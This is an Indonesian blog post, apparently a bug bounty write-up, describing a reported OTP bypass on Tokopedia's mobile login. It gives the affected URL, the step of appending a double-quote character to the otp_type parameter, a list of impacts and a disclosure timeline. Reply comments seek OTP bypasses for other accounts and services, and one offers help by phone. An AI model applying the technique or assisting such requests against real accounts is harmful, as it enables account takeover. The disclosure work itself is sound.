Bug Tokopedia.com | Bug Bypass OTP on Tokopedia.com
Bypass OTP On Tokopedia.com
Affected Endpoint :
https://m.tokopedia.com/otp/c/page?d=Wed%2C+26+Dec+2018+ 14%3A35%3A07+%2B0700&h=
o00Jc8xwDa3spCaFrz5nwNu5Sk1gDmZxRqIwbhOY4%2FM%3D&ld =https%3A%2F%2Fm.tokopedia.com%2Fotp%2Finterrupt%2Fsl& otp_type=13
Impact :
1. Seseorang dapat melewati OTP
2. Melakukan kegiatan yang mereka mau di dalam akun setelah melewati otp
3. Mungkin bisa melakukan transaksi dan membypass otp saat pembelian
Steps to Reproduce :
1. Ini contoh url akun test saya saat akan login di berhentikan oleh otp
https://m.tokopedia.com/otp/c/page?d=Wed%2C+26+Dec+2018+ 14%3A35%3A07+%2B0700&h=
o00Jc8xwDa3spCaFrz5nwNu5Sk1gDmZxRqIwbhOY4%2FM%3 D&ld=https%3A%2F%2Fm.tokopedia. com%2Fotp%2Finterrupt%2Fsl&otp_type=13
2. Untuk membypass kita tinggal tambahkan double string di akhir parameter &otp_type=13"
Contoh : https://m.tokopedia.com/otp/c/page?d=Wed%2C+26+Dec+ 2018+14%3A35%3A07+%2B0700&h=
o00Jc8xwDa3spCaFrz5nwNu5Sk1gDmZxRqIwbhOY4%2FM%3 D&ld=https%3A%2F%2Fm.tokopedia. com%2Fotp%2Finterrupt%2Fsl&otp_type=13"
Timeline :
• 26 Desember 2018 : Poc Sent
• 26 Desember 2018 : Poc tambahan di kirim
• 27 Desember 2018 : Bug Valid Dengan Severty Low
• 12 Januari 2019. : IT Ask Name For Sertifikat
• 21 Januari 2019. : Sertifikat Di terima
Ps : Saya seorang anak muda yang menekuni security research atau ethical hacking dan saya sedang mencari pekerjaan Remote atau di Indonesia, saya memiliki beberapa sertifikat dari hasil pentest ke berbagai perusahaan dan HOF (hall of fame) di perusahaan Microsoft.
Anda bisa menghubungi saya lewat Email
kalau otp di aplikasi blibli bisa ?
ReplyDeleteCara bypass otp tokopedia selain cara di atas ada lagi tidak? Karena akun saya selalu minta verifikasi padahal nomer hp sudah hangus
ReplyDeleteSaya bisa waaja089509735824
Delete